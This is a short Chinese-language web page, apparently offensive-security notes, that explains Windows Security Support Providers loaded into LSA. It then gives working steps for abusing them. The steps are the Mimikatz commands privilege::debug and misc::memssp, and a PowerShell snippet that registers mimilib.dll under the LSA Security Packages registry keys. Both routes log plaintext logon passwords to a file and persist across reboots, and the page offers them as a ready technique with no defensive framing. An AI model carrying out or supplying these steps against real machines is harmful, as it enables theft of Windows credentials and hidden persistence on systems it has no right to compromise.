Skip to main content

自定义SSP

安全支持提供程序 (SSP) 是 Windows 用来执行 Windows 登录身份验证的 API。 它是为其他应用程序提供安全包的 DLL 文件。 当系统启动时,这个 DLL 在 LSA 中堆叠起来; 使其成为一个自启动进程。 在 LSA 中加载后,它可以访问所有windows的凭据。 此文件的配置存储在两个不同的注册表项中,我们可以在注册表找到它:HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

 Microsoft 的一些 SSP 包裹是
- NTLM
- Kerberos
- Wdigest
- CredSSP


Mimikatz 提供自定义 SSP - mimilib.dll。 此 SSP 在目标服务器上以明文形式记录本地登录、服务帐户和计算机帐户密码。我们可以通过自动和手动的方式来利用自定义SSP实现持久化。

自动

运行mimikatz,执行命令

privilege::debug

 misc::memssp

之后可以在 C:\Windows\system32\kiwissp.log 查看明文登陆日志。

 

手动

将mimilib.dll放在SYSTEM32目录下,并且将mimilib添加到注册表 HKLM\SYSTEM\CurrentControlSet\Control\Lsa\Security Packages

$packages = Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages'| select -ExpandProperty 'Security Packages'
$packages += "mimilib"
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\OSConfig\ -Name 'Security Packages' -Value $packages
Set-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Control\Lsa\ -Name 'Security Packages' -Value $packages 

image.png

image.png

image.png

image.png

 

Back to top